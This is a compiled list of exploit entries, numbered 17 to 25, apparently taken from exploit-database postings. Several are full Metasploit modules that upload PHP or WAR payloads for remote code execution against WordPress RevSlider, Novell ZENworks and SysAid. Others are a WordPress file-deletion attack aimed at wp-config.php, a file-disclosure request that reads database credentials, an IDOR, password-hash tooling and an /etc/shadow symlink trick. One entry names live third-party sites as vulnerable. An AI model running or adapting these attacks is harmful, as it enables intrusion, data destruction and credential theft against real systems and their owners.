  17. Title: Borland's InterBase 7.1 poor Password Data File Permissions and Password Hash Author: Larry W. Cashdollar, @_larry0 Date: 2003-11-26 CVE-ID:[CVE-2004-1833] Download Site: http://www.borland.com/interbase Vendor: Borland Vendor Notified: 2003-11-26 Vendor Contact: disclosed via idefense Advisory: http://www.vapid.dhs.org/advisories/borland_interbase_db_vulnerablities.html Description: Borland InterBase raises the bar for performance and power in small footprint databases. Designed for use in situations where there is no database administrator or IT support, InterBase is powerful enough to support mission-critical applications, yet compact enough to run on very modest systems. It can be easily transported by disk, CD, or even dial-up download. And unlike enterprise databases that require expensive ecosystems of support and maintenance, InterBase requires virtually no maintenance. Vulnerability: The "information database" stored in the file admin4.pcb is read and writeable for all users with local access to the system. [root@Fester interbase]# ls -l /opt/interbase/admin.ib -rw-rw-rw- 1 root root 616497 Nov 20 10:04 /opt/interbase/admin.ib Not only is the password file stored read writeable by all local users but the password hash is done with one salt "9z" and then hashed again. As an addition to the permissions issue, I thought I should flesh out the fact that the double crypt() does not add any security to the hash with out the salt. The purpose of the salt is so that the same passwords dont always have the same hashes. With them removing the salt the hashes will always be the same for the same password reguardless of crypt() being called twice. This can be expressed in this line pesudo C: crypt(&crypt(user_password,"9z")[2],"9z") Exploit Code: Local attackers can exploit this vulnerability to add or modify accounts in Interbase. The following C program will generate hashed passwords that can be injected into admin.ib database. /*Larry W. Cashdollar Vapid Labs. Borland Interbase 7.1 password creator. lwc@vapid.dhs.org */ #include <stdio.h> #include <unistd.h> #define SALT "9z" int main (int argc, char *argv[]) { char crypt1,crypt2; if (!argv[1]) { printf ("Borland InterBase db password tool.\n Larry Cashdollar, vapid labs\nEnter desired password as an argument\n"); exit(); } crypt1 =(char *) crypt (argv[1],SALT); crypt2 =(char *) crypt (&crypt1[2],SALT); printf("Double crypt() is: %s\n",crypt2); printf("With out salt (as stored in isc4.gdb/admin.ib: %s\n",&crypt2[2]); return(0); }
  18. Title: PrimeBase Database Poor File Permissions and Crypt() Hash Author: Larry W. Cashdollar, @_larry0 Date: 2003-10-20 CVE-ID: Download Site: http://www.firebirdsql.org http://www.ibphoenix.com Vendor: Primebase SQL Vendor Notified: 2003-10-20 Vendor Contact: http://www.primebase.de/index.html Advisory: http://www.vapid.dhs.org/advisories/primebase_sql_database_stored_cleartext_password.html Description: The Firebird(tm) database engine is derived from the InterBase(r) product currently owned by Borland. The documentation forInterBase v 6.0 applies also to the current FireBird release. InterBase documentation is available in Adobe Acrobat format from http://info.borland.com/techpubs/interbase/." The "information database" stored in the file isc4.gdb is read and writeable for all users with the default rpm installation of Firebird-1.0.3 for Linux. Vulnerability: [root@Fester interbase]# ls -l /opt/interbase/isc4.gdb -rw-rw-rw- 1 root root 618497 Jun 8 14:44 /opt/interbase/isc4.gdb This file contains the password hashes and usernames for the firebird database. The passwords are hashed twice, once with the static salt "9z" and a second time with the returned crypt text minus the salt. crypt(&amp;crypt(user_password,"9z")[2],"9z") The PrimeBase SQL Database Server 4.2 stores passwords in clear text, and based on the installation users umask settings maybe readable by all local users. From the readme.txt file: "The Admin server will require you to enter your password in a text file called 'password.adm' (in the server folder), before you can continue. NOTE: This is the password for access to the Admin Server only." Depending on your umask settings (default 022 for root) the "Admin Server" password maybe readable by local users. Also the password is not stored as a hash or encrypted. A malicious user could uses this password to access the web based administration server and compromise the system. The database also comes with a default "Administrator" account with no password, the documentation does recommend the installer set the Administrator password during installation. Recommendations: Store the password as a hash in a file read-only by the Admin Server. Disable the Administrator account until a password has been set for it. This is still a problem for the symlink attack during installation for the primebase products. See previous link above for more detal. They just changed the format of the filename to something just as trivial as a static filename. Not going to bother reporting or posting this. LOG="/tmp/PrimeBase_"`date '+%y%m%d%H%M'`".log" Just as easy to ln -s /tmp/PrimeBase_$date.log to /etc/shadow.
  19. ################################################################################################# # Exploit Title : Joomla Com_BibleStudy Proclaim MediaFileForm Remote File Upload Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 28/09/2018 # Vendor Homepage : joomlabiblestudy.org ~ extensions.joomla.org/extension/proclaim/ # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # CVE: CVE-2018-7316 # CWE : CWE-264 [ Permissions, Privileges, and Access Controls ] ################################################################################################# # Google Dork : inurl:''/index.php?option=com_biblestudy'' # Exploit : TARGET/index.php?option=com_biblestudy&view=mediafileform&layout=edit&id=1 # Note : Go to the '' Media Files '' Category. Choose your File and Upload it. # Directory File Path : TARGET/images/biblestudy/media/.... ################################################################################################# # Example Vulnerable Sites => kalamekhuda.com/index.php?option=com_biblestudy&view=mediafileform&layout=edit&id=1 => [ Proof of Concept for Vulnerability and Proof of Mirror ] => archive.is/nfskL => archive.is/5NaKe hereatcalvary.org/index.php?option=com_biblestudy&view=mediafileform&layout=edit&id=1 [ Proof of Concept ] => archive.is/oEPx3 cclivinghope.org/index.php?option=com_biblestudy&view=mediafileform&layout=edit&id=1 ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################
  20. *Exploit Title:* IDOR on ProConf Peer-Review and Conference Management System *Date:* 19/07/2018 *Exploit Author:* S. M. Zia Ur Rashid *Author Contact:* https://www.linkedin.com/in/ziaurrashid/ *Vendor Homepage:* http://proconf.org & http://myproconf.org *Affected Version:* <= 6.0 *Patched Version:* 6.1 *CVE ID:* CVE-2018-16606 *Description:* In ProConf before 6.1, an Insecure Direct Object Reference (IDOR) allows any author to view and grab all submitted papers (Title and Abstract) and their authors' personal information (Name, Email, Organization, and Position) by changing the value of Paper ID (the pid parameter). PROOF-OF-CONCEPT Step 1: Sign In as an author for a conference & submit a paper. Youall get a paper ID. Step 2: Now go to paper details and change the value of Paper ID (param pid=xxxx) to nearest previous value to view others submitted paper & authors information. http:// <http:> [host]/conferences/[conference-name]/author/show_paper_details.php?pid=xxxx
  21. # Exploit Title: Wordpress 4.9.6 Arbitrary File Deletion Vulnerability # Google Dork: N/A # Date: 2018-09-3 # Exploit Author: Rednofozi # Vendor Homepage: http://www.wordpress.org # Software Link:http://www.wordpress.org/download # Affected Version: 4.9.6 # Tested on: php7 mysql5 # CVE : N/A # Proof Of Concept ************************************************************************** Step 1: ``` curl -v 'http://localhost/wp-admin/post.php?post=4' -H 'Cookie: ***' -d 'action=editattachment&_wpnonce=***&thumb=../../../../wp-config.php' ``` Step 2: ``` curl -v 'http://localhost/wp-admin/post.php?post=4' -H 'Cookie: ***' -d 'action=delete&_wpnonce=***' ``` ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ # Discovered by : Rednofozi #--tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow http://www.exploit4arab.org/exploits/2000
  22. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::HTTP::Wordpress include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'Wordpress RevSlider File Upload and Execute Vulnerability', 'Description' => %q{ This module exploits an arbitrary PHP code upload in the WordPress ThemePunch Revolution Slider ( revslider ) plugin, version 3.0.95 and prior. The vulnerability allows for arbitrary file upload and remote code execution. }, 'Author' => [ 'Simo Ben youssef', # Vulnerability discovery 'Tom Sellers <tom[at]fadedcode.net>' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['URL', 'https://whatisgon.wordpress.com/2014/11/30/another-revslider-vulnerability/'], ['EDB', '35385'], ['WPVDB', '7954'], ['OSVDB', '115118'] ], 'Privileged' => false, 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [['ThemePunch Revolution Slider (revslider) 3.0.95', {}]], 'DisclosureDate' => 'Nov 26 2015', 'DefaultTarget' => 0) ) end def check release_log_url = normalize_uri(wordpress_url_plugins, 'revslider', 'release_log.txt') check_version_from_custom_file(release_log_url, /^\s*(?:version)\s*(\d{1,2}\.\d{1,2}(?:\.\d{1,2})?).*$/mi, '3.0.96') end def exploit php_pagename = rand_text_alpha(4 + rand(4)) + '.php' # Build the zip payload_zip = Rex::Zip::Archive.new # If the filename in the zip is revslider.php it will be automatically # executed but it will break the plugin and sometimes WordPress payload_zip.add_file('revslider/' + php_pagename, payload.encoded) # Build the POST body data = Rex::MIME::Message.new data.add_part('revslider_ajax_action', nil, nil, 'form-data; name="action"') data.add_part('update_plugin', nil, nil, 'form-data; name="client_action"') data.add_part(payload_zip.pack, 'application/x-zip-compressed', 'binary', "form-data; name=\"update_file\"; filename=\"revslider.zip\"") post_data = data.to_s res = send_request_cgi( 'uri' => wordpress_url_admin_ajax, 'method' => 'POST', 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => post_data ) if res if res.code == 200 && res.body =~ /Update in progress/ # The payload itself almost never deleted, try anyway register_files_for_cleanup(php_pagename) # This normally works register_files_for_cleanup('../revslider.zip') final_uri = normalize_uri(wordpress_url_plugins, 'revslider', 'temp', 'update_extract', 'revslider', php_pagename) print_good("#{peer} - Our payload is at: #{final_uri}") print_status("#{peer} - Calling payload...") send_request_cgi( 'uri' => normalize_uri(final_uri), 'timeout' => 5 ) elsif res.code == 200 && res.body =~ /^0$/ # admin-ajax.php returns 0 if the 'action' 'revslider_ajax_action' is unknown fail_with(Failure::NotVulnerable, "#{peer} - Target not vulnerable or the plugin is deactivated") else fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}") end else fail_with(Failure::Unknown, 'ERROR') end end end
  23. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Novell ZENworks Configuration Management Arbitrary File Upload', 'Description' => %q{ This module exploits a file upload vulnerability in Novell ZENworks Configuration Management (ZCM, which is part of the ZENworks Suite). The vulnerability exists in the UploadServlet which accepts unauthenticated file uploads and does not check the "uid" parameter for directory traversal characters. This allows an attacker to write anywhere in the file system, and can be abused to deploy a WAR file in the Tomcat webapps directory. ZCM up to (and including) 11.3.1 is vulnerable to this attack. This module has been tested successfully with ZCM 11.3.1 on Windows and Linux. Note that this is a similar vulnerability to ZDI-10-078 / OSVDB-63412 which also has a Metasploit exploit, but it abuses a different parameter of the same servlet. }, 'Author' => [ 'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability Discovery and Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2015-0779'], ['OSVDB', '120382'], ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/generic/zenworks_zcm_rce.txt'], ['URL', 'http://seclists.org/fulldisclosure/2015/Apr/21'] ], 'DefaultOptions' => { 'WfsDelay' => 30 }, 'Privileged' => true, 'Platform' => 'java', 'Arch' => ARCH_JAVA, 'Targets' => [ [ 'Novell ZCM < v11.3.2 - Universal Java', { } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Apr 7 2015')) register_options( [ Opt::RPORT(443), OptBool.new('SSL', [true, 'Use SSL', true]), OptString.new('TARGETURI', [true, 'The base path to ZCM / ZENworks Suite', '/zenworks/']), OptString.new('TOMCAT_PATH', [false, 'The Tomcat webapps traversal path (from the temp directory)']) ], self.class) end def check res = send_request_cgi({ 'uri' => normalize_uri(datastore['TARGETURI'], 'UploadServlet'), 'method' => 'GET' }) if res && res.code == 200 && res.body.to_s =~ /ZENworks File Upload Servlet/ return Exploit::CheckCode::Detected end Exploit::CheckCode::Safe end def upload_war_and_exec(tomcat_path) app_base = rand_text_alphanumeric(4 + rand(32 - 4)) war_payload = payload.encoded_war({ :app_name => app_base }).to_s print_status("#{peer} - Uploading WAR file to #{tomcat_path}") res = send_request_cgi({ 'uri' => normalize_uri(datastore['TARGETURI'], 'UploadServlet'), 'method' => 'POST', 'data' => war_payload, 'ctype' => 'application/octet-stream', 'vars_get' => { 'uid' => tomcat_path, 'filename' => "#{app_base}.war" } }) if res && res.code == 200 print_status("#{peer} - Upload appears to have been successful") else print_error("#{peer} - Failed to upload, try again with a different path?") return false end 10.times do Rex.sleep(2) # Now make a request to trigger the newly deployed war print_status("#{peer} - Attempting to launch payload in deployed WAR...") send_request_cgi({ 'uri' => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8)), 'method' => 'GET' }) # Failure. The request timed out or the server went away. break if res.nil? # Failure. Unexpected answer break if res.code != 200 # Unless session... keep looping return true if session_created? end false end def exploit tomcat_paths = [] if datastore['TOMCAT_PATH'] tomcat_paths << datastore['TOMCAT_PATH'] end tomcat_paths.concat(['../../../opt/novell/zenworks/share/tomcat/webapps/', '../webapps/']) tomcat_paths.each do |tomcat_path| break if upload_war_and_exec(tomcat_path) end end end
  24. mohammad_ghazei

    Hacking

    ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'zlib' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => "SysAid Help Desk 'rdslogs' Arbitrary File Upload", 'Description' => %q{ This module exploits a file upload vulnerability in SysAid Help Desk v14.3 and v14.4. The vulnerability exists in the RdsLogsEntry servlet which accepts unauthenticated file uploads and handles zip file contents in a insecure way. By combining both weaknesses, a remote attacker can accomplish remote code execution. Note that this will only work if the target is running Java 6 or 7 up to 7u25, as Java 7u40 and above introduces a protection against null byte injection in file names. This module has been tested successfully on version v14.3.12 b22 and v14.4.32 b25 in Linux. In theory this module also works on Windows, but SysAid seems to bundle Java 7u40 and above with the Windows package which prevents the vulnerability from being exploited. }, 'Author' => [ 'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability Discovery and Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2015-2995' ], [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/generic/sysaid-14.4-multiple-vulns.txt' ], [ 'URL', 'http://seclists.org/fulldisclosure/2015/Jun/8' ] ], 'DefaultOptions' => { 'WfsDelay' => 30 }, 'Privileged' => false, 'Platform' => 'java', 'Arch' => ARCH_JAVA, 'Targets' => [ [ 'SysAid Help Desk v14.3 - 14.4 / Java Universal', { } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jun 3 2015')) register_options( [ Opt::RPORT(8080), OptInt.new('SLEEP', [true, 'Seconds to sleep while we wait for WAR deployment', 15]), OptString.new('TARGETURI', [true, 'Base path to the SysAid application', '/sysaid/']) ], self.class) end def check servlet_path = 'rdslogs' bogus_file = rand_text_alphanumeric(4 + rand(32 - 4)) res = send_request_cgi({ 'uri' => normalize_uri(datastore['TARGETURI'], servlet_path), 'method' => 'POST', 'vars_get' => { 'rdsName' => bogus_file } }) if res && res.code == 200 return Exploit::CheckCode::Detected end end def exploit app_base = rand_text_alphanumeric(4 + rand(32 - 4)) tomcat_path = '../../../../' servlet_path = 'rdslogs' # We need to create the upload directories before our first attempt to upload the WAR. print_status("#{peer} - Creating upload directory") bogus_file = rand_text_alphanumeric(4 + rand(32 - 4)) send_request_cgi({ 'uri' => normalize_uri(datastore['TARGETURI'], servlet_path), 'method' => 'POST', 'data' => Zlib::Deflate.deflate(rand_text_alphanumeric(4 + rand(32 - 4))), 'ctype' => 'application/xml', 'vars_get' => { 'rdsName' => bogus_file } }) war_payload = payload.encoded_war({ :app_name => app_base }).to_s # We have to use the Zlib deflate routine as the Metasploit Zip API seems to fail print_status("#{peer} - Uploading WAR file...") res = send_request_cgi({ 'uri' => normalize_uri(datastore['TARGETURI'], servlet_path), 'method' => 'POST', 'data' => Zlib::Deflate.deflate(war_payload), 'ctype' => 'application/octet-stream', 'vars_get' => { 'rdsName' => "#{tomcat_path}/tomcat/webapps/#{app_base}.war\x00" } }) # The server either returns a 200 OK when the upload is successful. if res && res.code == 200 print_status("#{peer} - Upload appears to have been successful, waiting #{datastore['SLEEP']} seconds for deployment") register_files_for_cleanup("tomcat/webapps/#{app_base}.war") else fail_with(Failure::Unknown, "#{peer} - WAR upload failed") end 10.times do select(nil, nil, nil, 2) # Now make a request to trigger the newly deployed war print_status("#{peer} - Attempting to launch payload in deployed WAR...") res = send_request_cgi({ 'uri' => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8)), 'method' => 'GET' }) # Failure. The request timed out or the server went away. break if res.nil? # Success! Triggered the payload, should have a shell incoming break if res.code == 200 end end end
  25. ############################################ # Title : IBOOKING CMS - LOCAL FILE DISCLOSURE VULNERABILITY # category : webapps # Tested On : win 8 . Kali Linux # my team:https://anonysec.org # me : Rednofozi@yahoo.com # Vendor HomePage :ibooking.com.br # Google Dork: intext:"Desenvolvido por ibooking" # Sofrware version: all ############################################ # search google Dork : intext:"Desenvolvido por ibooking" ####################Proof of Concept ############# # IBOOKING RESERVAS INTELIGENTES - LOCAL FILE DISCLOSURE VULNERABILITY USAGE: http://hotel-example.com.br/pousada/sem-cache.php?filename= < lfd > 1. GET http://hotel-example.com.br/pousada/sem-cache.php?filename=../Connections/conexao.php 2. GET view-source:hotel-example.com.br/pousada/sem-cache.php?filename=../Connections/conexao.php 3. CONTENT: <?php $hostname_conexao = "mysql.hotel-example.com.br"; $database_conexao = "exampleDB"; $username_conexao = "exampleUSER"; $password_conexao = "13password37"; $conexao = mysql_connect($hostname_conexao, $username_conexao, $password_conexao) or trigger_error(mysql_error(),E_USER_ERROR); ?> ###################### # Discovered by : Rednofozi #--tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow https://0days.info/?exp=9461132